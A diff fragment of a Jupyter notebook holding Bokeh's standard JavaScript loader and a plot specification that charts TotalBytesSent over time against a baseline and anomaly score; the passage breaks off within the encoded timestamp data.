+       "     \"output_notebook(resources=INLINE)\\n\"+\n",
+       "     \"</code>\\n\"+\n",
+       "     \"</div>\"}};\n",
+       "\n",
+       "  function display_loaded() {\n",
+       "    var el = document.getElementById(\"1001\");\n",
+       "    if (el != null) {\n",
+       "      el.textContent = \"BokehJS is loading...\";\n",
+       "    }\n",
+       "    if (root.Bokeh !== undefined) {\n",
+       "      if (el != null) {\n",
+       "        el.textContent = \"BokehJS \" + root.Bokeh.version + \" successfully loaded.\";\n",
+       "      }\n",
+       "    } else if (Date.now() < root._bokeh_timeout) {\n",
+       "      setTimeout(display_loaded, 100)\n",
+       "    }\n",
+       "  }\n",
+       "\n",
+       "\n",
+       "  function run_callbacks() {\n",
+       "    try {\n",
+       "      root._bokeh_onload_callbacks.forEach(function(callback) {\n",
+       "        if (callback != null)\n",
+       "          callback();\n",
+       "      });\n",
+       "    } finally {\n",
+       "      delete root._bokeh_onload_callbacks\n",
+       "    }\n",
+       "    console.debug(\"Bokeh: all callbacks have finished\");\n",
+       "  }\n",
+       "\n",
+       "  function load_libs(css_urls, js_urls, callback) {\n",
+       "    if (css_urls == null) css_urls = [];\n",
+       "    if (js_urls == null) js_urls = [];\n",
+       "\n",
+       "    root._bokeh_onload_callbacks.push(callback);\n",
+       "    if (root._bokeh_is_loading > 0) {\n",
+       "      console.debug(\"Bokeh: BokehJS is being loaded, scheduling callback at\", now());\n",
+       "      return null;\n",
+       "    }\n",
+       "    if (js_urls == null || js_urls.length === 0) {\n",
+       "      run_callbacks();\n",
+       "      return null;\n",
+       "    }\n",
+       "    console.debug(\"Bokeh: BokehJS not loaded, scheduling load and callback at\", now());\n",
+       "    root._bokeh_is_loading = css_urls.length + js_urls.length;\n",
+       "\n",
+       "    function on_load() {\n",
+       "      root._bokeh_is_loading--;\n",
+       "      if (root._bokeh_is_loading === 0) {\n",
+       "        console.debug(\"Bokeh: all BokehJS libraries/stylesheets loaded\");\n",
+       "        run_callbacks()\n",
+       "      }\n",
+       "    }\n",
+       "\n",
+       "    function on_error() {\n",
+       "      console.error(\"failed to load \" + url);\n",
+       "    }\n",
+       "\n",
+       "    for (var i = 0; i < css_urls.length; i++) {\n",
+       "      var url = css_urls[i];\n",
+       "      const element = document.createElement(\"link\");\n",
+       "      element.onload = on_load;\n",
+       "      element.onerror = on_error;\n",
+       "      element.rel = \"stylesheet\";\n",
+       "      element.type = \"text/css\";\n",
+       "      element.href = url;\n",
+       "      console.debug(\"Bokeh: injecting link tag for BokehJS stylesheet: \", url);\n",
+       "      document.body.appendChild(element);\n",
+       "    }\n",
+       "\n",
+       "    const hashes = {\"https://cdn.bokeh.org/bokeh/release/bokeh-2.0.1.min.js\": \"JpP8FXbgAZLkfur7LiK3j9AGBhHNIvF742meBJrjO2ShJDhCG2I1uVvW+0DUtrmc\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.0.1.min.js\": \"xZlADit0Q04ISQEdKg2k3L4W9AwQBAuDs9nJL9fM/WwzL1tEU9VPNezOFX0nLEAz\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.0.1.min.js\": \"4BuPRZkdMKSnj3zoxiNrQ86XgNw0rYmBOxe7nshquXwwcauupgBF2DHLVG1WuZlV\", \"https://cdn.bokeh.org/bokeh/release/bokeh-gl-2.0.1.min.js\": \"Dv1SQ87hmDqK6S5OhBf0bCuwAEvL5QYL0PuR/F1SPVhCS/r/abjkbpKDYL2zeM19\"};\n",
+       "\n",
+       "    for (var i = 0; i < js_urls.length; i++) {\n",
+       "      var url = js_urls[i];\n",
+       "      var element = document.createElement('script');\n",
+       "      element.onload = on_load;\n",
+       "      element.onerror = on_error;\n",
+       "      element.async = false;\n",
+       "      element.src = url;\n",
+       "      if (url in hashes) {\n",
+       "        element.crossOrigin = \"anonymous\";\n",
+       "        element.integrity = \"sha384-\" + hashes[url];\n",
+       "      }\n",
+       "      console.debug(\"Bokeh: injecting script tag for BokehJS library: \", url);\n",
+       "      document.head.appendChild(element);\n",
+       "    }\n",
+       "  };var element = document.getElementById(\"1001\");\n",
+       "  if (element == null) {\n",
+       "    console.error(\"Bokeh: ERROR: autoload.js configured with elementid '1001' but no matching script tag was found. \")\n",
+       "    return false;\n",
+       "  }\n",
+       "\n",
+       "  function inject_raw_css(css) {\n",
+       "    const element = document.createElement(\"style\");\n",
+       "    element.appendChild(document.createTextNode(css));\n",
+       "    document.body.appendChild(element);\n",
+       "  }\n",
+       "\n",
+       "  \n",
+       "  var js_urls = [\"https://cdn.bokeh.org/bokeh/release/bokeh-2.0.1.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.0.1.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.0.1.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-gl-2.0.1.min.js\"];\n",
+       "  var css_urls = [];\n",
+       "  \n",
+       "\n",
+       "  var inline_js = [\n",
+       "    function(Bokeh) {\n",
+       "      Bokeh.set_log_level(\"info\");\n",
+       "    },\n",
+       "    function(Bokeh) {\n",
+       "    \n",
+       "    \n",
+       "    }\n",
+       "  ];\n",
+       "\n",
+       "  function run_inline_js() {\n",
+       "    \n",
+       "    if (root.Bokeh !== undefined || force === true) {\n",
+       "      \n",
+       "    for (var i = 0; i < inline_js.length; i++) {\n",
+       "      inline_js[i].call(root, root.Bokeh);\n",
+       "    }\n",
+       "    if (force === true) {\n",
+       "        display_loaded();\n",
+       "      }} else if (Date.now() < root._bokeh_timeout) {\n",
+       "      setTimeout(run_inline_js, 100);\n",
+       "    } else if (!root._bokeh_failed_load) {\n",
+       "      console.log(\"Bokeh: BokehJS failed to load within specified timeout.\");\n",
+       "      root._bokeh_failed_load = true;\n",
+       "    } else if (force !== true) {\n",
+       "      var cell = $(document.getElementById(\"1001\")).parents('.cell').data().cell;\n",
+       "      cell.output_area.append_execute_result(NB_LOAD_WARNING)\n",
+       "    }\n",
+       "\n",
+       "  }\n",
+       "\n",
+       "  if (root._bokeh_is_loading === 0) {\n",
+       "    console.debug(\"Bokeh: BokehJS loaded, going straight to plotting\");\n",
+       "    run_inline_js();\n",
+       "  } else {\n",
+       "    load_libs(css_urls, js_urls, function() {\n",
+       "      console.debug(\"Bokeh: BokehJS plotting callback run at\", now());\n",
+       "      run_inline_js();\n",
+       "    });\n",
+       "  }\n",
+       "}(window));"
+      ],
+      "application/vnd.bokehjs_load.v0+json": "\n(function(root) {\n  function now() {\n    return new Date();\n  }\n\n  var force = true;\n\n  if (typeof root._bokeh_onload_callbacks === \"undefined\" || force === true) {\n    root._bokeh_onload_callbacks = [];\n    root._bokeh_is_loading = undefined;\n  }\n\n  \n\n  \n  if (typeof (root._bokeh_timeout) === \"undefined\" || force === true) {\n    root._bokeh_timeout = Date.now() + 5000;\n    root._bokeh_failed_load = false;\n  }\n\n  var NB_LOAD_WARNING = {'data': {'text/html':\n     \"<div style='background-color: #fdd'>\\n\"+\n     \"<p>\\n\"+\n     \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n     \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n     \"</p>\\n\"+\n     \"<ul>\\n\"+\n     \"<li>re-rerun `output_notebook()` to attempt to load from CDN again, or</li>\\n\"+\n     \"<li>use INLINE resources instead, as so:</li>\\n\"+\n     \"</ul>\\n\"+\n     \"<code>\\n\"+\n     \"from bokeh.resources import INLINE\\n\"+\n     \"output_notebook(resources=INLINE)\\n\"+\n     \"</code>\\n\"+\n     \"</div>\"}};\n\n  function display_loaded() {\n    var el = document.getElementById(\"1001\");\n    if (el != null) {\n      el.textContent = \"BokehJS is loading...\";\n    }\n    if (root.Bokeh !== undefined) {\n      if (el != null) {\n        el.textContent = \"BokehJS \" + root.Bokeh.version + \" successfully loaded.\";\n      }\n    } else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(display_loaded, 100)\n    }\n  }\n\n\n  function run_callbacks() {\n    try {\n      root._bokeh_onload_callbacks.forEach(function(callback) {\n        if (callback != null)\n          callback();\n      });\n    } finally {\n      delete root._bokeh_onload_callbacks\n    }\n    console.debug(\"Bokeh: all callbacks have finished\");\n  }\n\n  function load_libs(css_urls, js_urls, callback) {\n    if (css_urls == null) css_urls = [];\n    if (js_urls == null) js_urls = [];\n\n    root._bokeh_onload_callbacks.push(callback);\n    if (root._bokeh_is_loading > 0) {\n      console.debug(\"Bokeh: BokehJS is being loaded, scheduling callback at\", now());\n      return null;\n    }\n    if (js_urls == null || js_urls.length === 0) {\n      run_callbacks();\n      return null;\n    }\n    console.debug(\"Bokeh: BokehJS not loaded, scheduling load and callback at\", now());\n    root._bokeh_is_loading = css_urls.length + js_urls.length;\n\n    function on_load() {\n      root._bokeh_is_loading--;\n      if (root._bokeh_is_loading === 0) {\n        console.debug(\"Bokeh: all BokehJS libraries/stylesheets loaded\");\n        run_callbacks()\n      }\n    }\n\n    function on_error() {\n      console.error(\"failed to load \" + url);\n    }\n\n    for (var i = 0; i < css_urls.length; i++) {\n      var url = css_urls[i];\n      const element = document.createElement(\"link\");\n      element.onload = on_load;\n      element.onerror = on_error;\n      element.rel = \"stylesheet\";\n      element.type = \"text/css\";\n      element.href = url;\n      console.debug(\"Bokeh: injecting link tag for BokehJS stylesheet: \", url);\n      document.body.appendChild(element);\n    }\n\n    const hashes = {\"https://cdn.bokeh.org/bokeh/release/bokeh-2.0.1.min.js\": \"JpP8FXbgAZLkfur7LiK3j9AGBhHNIvF742meBJrjO2ShJDhCG2I1uVvW+0DUtrmc\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.0.1.min.js\": \"xZlADit0Q04ISQEdKg2k3L4W9AwQBAuDs9nJL9fM/WwzL1tEU9VPNezOFX0nLEAz\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.0.1.min.js\": \"4BuPRZkdMKSnj3zoxiNrQ86XgNw0rYmBOxe7nshquXwwcauupgBF2DHLVG1WuZlV\", \"https://cdn.bokeh.org/bokeh/release/bokeh-gl-2.0.1.min.js\": \"Dv1SQ87hmDqK6S5OhBf0bCuwAEvL5QYL0PuR/F1SPVhCS/r/abjkbpKDYL2zeM19\"};\n\n    for (var i = 0; i < js_urls.length; i++) {\n      var url = js_urls[i];\n      var element = document.createElement('script');\n      element.onload = on_load;\n      element.onerror = on_error;\n      element.async = false;\n      element.src = url;\n      if (url in hashes) {\n        element.crossOrigin = \"anonymous\";\n        element.integrity = \"sha384-\" + hashes[url];\n      }\n      console.debug(\"Bokeh: injecting script tag for BokehJS library: \", url);\n      document.head.appendChild(element);\n    }\n  };var element = document.getElementById(\"1001\");\n  if (element == null) {\n    console.error(\"Bokeh: ERROR: autoload.js configured with elementid '1001' but no matching script tag was found. \")\n    return false;\n  }\n\n  function inject_raw_css(css) {\n    const element = document.createElement(\"style\");\n    element.appendChild(document.createTextNode(css));\n    document.body.appendChild(element);\n  }\n\n  \n  var js_urls = [\"https://cdn.bokeh.org/bokeh/release/bokeh-2.0.1.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.0.1.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.0.1.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-gl-2.0.1.min.js\"];\n  var css_urls = [];\n  \n\n  var inline_js = [\n    function(Bokeh) {\n      Bokeh.set_log_level(\"info\");\n    },\n    function(Bokeh) {\n    \n    \n    }\n  ];\n\n  function run_inline_js() {\n    \n    if (root.Bokeh !== undefined || force === true) {\n      \n    for (var i = 0; i < inline_js.length; i++) {\n      inline_js[i].call(root, root.Bokeh);\n    }\n    if (force === true) {\n        display_loaded();\n      }} else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(run_inline_js, 100);\n    } else if (!root._bokeh_failed_load) {\n      console.log(\"Bokeh: BokehJS failed to load within specified timeout.\");\n      root._bokeh_failed_load = true;\n    } else if (force !== true) {\n      var cell = $(document.getElementById(\"1001\")).parents('.cell').data().cell;\n      cell.output_area.append_execute_result(NB_LOAD_WARNING)\n    }\n\n  }\n\n  if (root._bokeh_is_loading === 0) {\n    console.debug(\"Bokeh: BokehJS loaded, going straight to plotting\");\n    run_inline_js();\n  } else {\n    load_libs(css_urls, js_urls, function() {\n      console.debug(\"Bokeh: BokehJS plotting callback run at\", now());\n      run_inline_js();\n    });\n  }\n}(window));"
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "  <div class=\"bk-root\" id=\"cbb2b4b8-7f1b-40c4-b7a4-2312b538e373\" data-root-id=\"1142\"></div>\n"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": [
+       "(function(root) {\n",
+       "  function embed_document(root) {\n",
+       "    \n",
+       "  var docs_json = {\"510ea36a-1825-4b95-885b-3ea6e271064e\":{\"roots\":{\"references\":[{\"attributes\":{\"children\":[{\"id\":\"1004\"},{\"id\":\"1112\"}]},\"id\":\"1142\",\"type\":\"Column\"},{\"attributes\":{\"source\":{\"id\":\"1131\"}},\"id\":\"1136\",\"type\":\"CDSView\"},{\"attributes\":{\"axis\":{\"id\":\"1019\"},\"dimension\":1,\"grid_line_color\":null,\"ticker\":null},\"id\":\"1022\",\"type\":\"Grid\"},{\"attributes\":{\"months\":[0,1,2,3,4,5,6,7,8,9,10,11]},\"id\":\"1173\",\"type\":\"MonthsTicker\"},{\"attributes\":{},\"id\":\"1178\",\"type\":\"Selection\"},{\"attributes\":{\"mantissas\":[1,2,5],\"max_interval\":500.0,\"num_minor_ticks\":0},\"id\":\"1166\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{},\"id\":\"1013\",\"type\":\"LinearScale\"},{\"attributes\":{\"below\":[{\"id\":\"1015\"}],\"center\":[{\"id\":\"1018\"},{\"id\":\"1022\"},{\"id\":\"1061\"}],\"left\":[{\"id\":\"1019\"}],\"min_border_left\":50,\"plot_height\":700,\"plot_width\":1200,\"renderers\":[{\"id\":\"1043\"},{\"id\":\"1066\"},{\"id\":\"1091\"}],\"title\":{\"id\":\"1005\"},\"toolbar\":{\"id\":\"1029\"},\"toolbar_location\":\"above\",\"x_range\":{\"id\":\"1007\"},\"x_scale\":{\"id\":\"1011\"},\"y_range\":{\"id\":\"1009\"},\"y_scale\":{\"id\":\"1013\"}},\"id\":\"1004\",\"subtype\":\"Figure\",\"type\":\"Plot\"},{\"attributes\":{\"days\":[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31]},\"id\":\"1169\",\"type\":\"DaysTicker\"},{\"attributes\":{\"callback\":null,\"formatters\":{\"TimeGenerated\":\"datetime\",\"Tooltip\":\"printf\"},\"tooltips\":[[\"TimeGenerated\",\"@TimeGenerated{%F %T}\"],[\"TotalBytesSent\",\"@TotalBytesSent\"],[\"baseline\",\"@baseline\"],[\"score\",\"@score\"]]},\"id\":\"1003\",\"type\":\"HoverTool\"},{\"attributes\":{\"months\":[0,4,8]},\"id\":\"1175\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"format\":\"00\"},\"id\":\"1038\",\"type\":\"NumeralTickFormatter\"},{\"attributes\":{\"days\":[\"%m-%d %H:%M\"],\"hours\":[\"%H:%M:%S\"],\"milliseconds\":[\"%H:%M:%S.%3N\"],\"minutes\":[\"%H:%M:%S\"],\"seconds\":[\"%H:%M:%S\"]},\"id\":\"1036\",\"type\":\"DatetimeTickFormatter\"},{\"attributes\":{\"axis_label\":\"TimeGenerated\",\"formatter\":{\"id\":\"1036\"},\"ticker\":{\"id\":\"1016\"}},\"id\":\"1015\",\"type\":\"DatetimeAxis\"},{\"attributes\":{\"dimensions\":\"width\"},\"id\":\"1023\",\"type\":\"WheelZoomTool\"},{\"attributes\":{},\"id\":\"1177\",\"type\":\"YearsTicker\"},{\"attributes\":{},\"id\":\"1011\",\"type\":\"LinearScale\"},{\"attributes\":{\"active_drag\":\"auto\",\"active_inspect\":\"auto\",\"active_multi\":{\"id\":\"1137\"},\"active_scroll\":\"auto\",\"active_tap\":\"auto\",\"tools\":[{\"id\":\"1137\"}]},\"id\":\"1127\",\"type\":\"Toolbar\"},{\"attributes\":{},\"id\":\"1026\",\"type\":\"SaveTool\"},{\"attributes\":{\"data_source\":{\"id\":\"1131\"},\"glyph\":{\"id\":\"1133\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"1134\"},\"selection_glyph\":null,\"view\":{\"id\":\"1136\"}},\"id\":\"1135\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"value\":\"firebrick\"},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"value\":\"firebrick\"},\"size\":{\"units\":\"screen\",\"value\":12},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"TotalBytesSent\"}},\"id\":\"1090\",\"type\":\"CircleX\"},{\"attributes\":{\"days\":[1,4,7,10,13,16,19,22,25,28]},\"id\":\"1170\",\"type\":\"DaysTicker\"},{\"attributes\":{\"months\":[0,6]},\"id\":\"1176\",\"type\":\"MonthsTicker\"},{\"attributes\":{},\"id\":\"1020\",\"type\":\"BasicTicker\"},{\"attributes\":{\"fill_color\":{\"value\":\"#1f77b4\"},\"line_color\":{\"value\":\"navy\"},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"TotalBytesSent\"}},\"id\":\"1041\",\"type\":\"Circle\"},{\"attributes\":{},\"id\":\"1009\",\"type\":\"DataRange1d\"},{\"attributes\":{\"base\":60,\"mantissas\":[1,2,5,10,15,20,30],\"max_interval\":1800000.0,\"min_interval\":1000.0,\"num_minor_ticks\":0},\"id\":\"1167\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"label\":{\"value\":\"observed\"},\"renderers\":[{\"id\":\"1043\"}]},\"id\":\"1062\",\"type\":\"LegendItem\"},{\"attributes\":{\"end\":1559861820000.0,\"start\":1556539380000.0},\"id\":\"1007\",\"type\":\"Range1d\"},{\"attributes\":{},\"id\":\"1163\",\"type\":\"Selection\"},{\"attributes\":{\"num_minor_ticks\":10,\"tickers\":[{\"id\":\"1049\"},{\"id\":\"1050\"},{\"id\":\"1051\"},{\"id\":\"1052\"},{\"id\":\"1053\"},{\"id\":\"1054\"},{\"id\":\"1055\"},{\"id\":\"1056\"},{\"id\":\"1057\"},{\"id\":\"1058\"},{\"id\":\"1059\"},{\"id\":\"1060\"}]},\"id\":\"1016\",\"type\":\"DatetimeTicker\"},{\"attributes\":{\"overlay\":{\"id\":\"1138\"},\"x_range\":{\"id\":\"1007\"},\"y_range\":null},\"id\":\"1137\",\"type\":\"RangeTool\"},{\"attributes\":{\"base\":24,\"mantissas\":[1,2,4,6,8,12],\"max_interval\":43200000.0,\"min_interval\":3600000.0,\"num_minor_ticks\":0},\"id\":\"1168\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"days\":[1,15]},\"id\":\"1172\",\"type\":\"DaysTicker\"},{\"attributes\":{},\"id\":\"1025\",\"type\":\"ResetTool\"},{\"attributes\":{\"fill_alpha\":0.2,\"fill_color\":\"navy\",\"level\":\"overlay\",\"line_alpha\":1.0,\"line_color\":\"black\",\"line_dash\":[2,2],\"line_width\":0.5},\"id\":\"1138\",\"type\":\"BoxAnnotation\"},{\"attributes\":{\"dimensions\":\"width\"},\"id\":\"1027\",\"type\":\"PanTool\"},{\"attributes\":{},\"id\":\"1164\",\"type\":\"UnionRenderers\"},{\"attributes\":{\"overlay\":{\"id\":\"1028\"}},\"id\":\"1024\",\"type\":\"BoxZoomTool\"},{\"attributes\":{},\"id\":\"1179\",\"type\":\"UnionRenderers\"},{\"attributes\":{\"active_drag\":\"auto\",\"active_inspect\":\"auto\",\"active_multi\":null,\"active_scroll\":\"auto\",\"active_tap\":\"auto\",\"tools\":[{\"id\":\"1003\"},{\"id\":\"1023\"},{\"id\":\"1024\"},{\"id\":\"1025\"},{\"id\":\"1026\"},{\"id\":\"1027\"}]},\"id\":\"1029\",\"type\":\"Toolbar\"},{\"attributes\":{\"source\":{\"id\":\"1087\"}},\"id\":\"1092\",\"type\":\"CDSView\"},{\"attributes\":{\"data\":{\"TimeGenerated\":{\"__ndarray__\":\"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pKt2QgAAgBWoq3ZCAABohKurdkIAAFDzrqt2QgAAOGKyq3ZCAAAg0bWrdkIAAAhAuat2QgAA8K68q3ZCAADYHcCrdkIAAMCMw6t2QgAAqPvGq3ZCAACQasqrdkIAAHjZzat2QgAAYEjRq3ZCAABIt9SrdkIAADAm2Kt2QgAAGJXbq3ZCAAAABN+rdkIAAOhy4qt2QgAA0OHlq3ZCAAC4UOmrdkIAAKC/7Kt2QgAAiC7wq3ZCAABwnfOrdkIAAFgM96t2QgAAQHv6q3ZCAAAo6v2rdkIAABBZAax2QgAA+McErHZCAADgNgisdkIAAMilC6x2QgAAsBQPrHZCAACYgxKsdkIAAIDyFax2QgAAaGEZrHZCAABQ0BysdkIAADg/IKx2QgAAIK4jrHZCAAAIHSesdkIAAPCLKqx2QgAA2PotrHZCAADAaTGsdkIAAKjYNKx2QgAAkEc4rHZCAAB4tjusdkIAAGAlP6x2QgAASJRCrHZCAAAwA0asdkIAABhySax2QgAAAOFMrHZCAADoT1CsdkIAANC+U6x2QgAAuC1XrHZCAACgnFqsdkIAAIgLXqx2QgAAcHphrHZCAABY6WSsdkIAAEBYaKx2QgAAKMdrrHZCAAAQNm+sdkIAAPikcqx2QgAA4BN2rHZCAADIgnmsdkIAALDxfKx2QgAAmGCArHZCAACAz4OsdkIAAGg+h6x2QgAAUK2KrHZCAAA4HI6sdkIAACCLkax2QgAACPqUrHZCAADwaJisdkIAANjXm6x2QgAAwEafrHZCAACotaKsdkIAAJAkpqx2QgAAeJOprHZCAABgAq2sdkIAAEhxsKx2QgAAMOCzrHZCAAAYT7esdkIAAAC+uqx2QgAA6Cy+rHZCAADQm8GsdkIAALgKxax2QgAAoHnIrHZCAACI6MusdkIAAHBXz6x2QgAAWMbSrHZCAABANdasdkIAACik2ax2QgAAEBPdrHZCAAD4geCsdkIAAODw46x2QgAAyF/nrHZCAACwzuqsdkIAAJg97qx2QgAAgKzxrHZCAABoG/WsdkIAAFCK+Kx2QgAAOPn7rHZCAAAgaP+sdkIAAAjXAq12QgAA8EUGrXZCAADYtAmtdkIAAMAjDa12QgAAqJIQrXZCAACQARStdkIAAHhwF612QgAAYN8arXZCAABITh6tdkIAADC9Ia12QgAAGCwlrXZCAAAAmyitdkIAAOgJLK12QgAA0HgvrXZCAAC45zKtdkIAAKBWNq12QgAAiMU5rXZCAABwND2tdkIAAFijQK12QgAAQBJErXZCAAAogUetdkIAABDwSq12QgAA+F5OrXZCAADgzVGtdkIAAMg8Va12QgAAsKtYrXZCAACYGlytdkIAAICJX612QgAAaPhirXZCAABQZ2atdkIAADjWaa12QgAAIEVtrXZCAAAItHCtdkIAAPAidK12QgAA2JF3rXZCAAD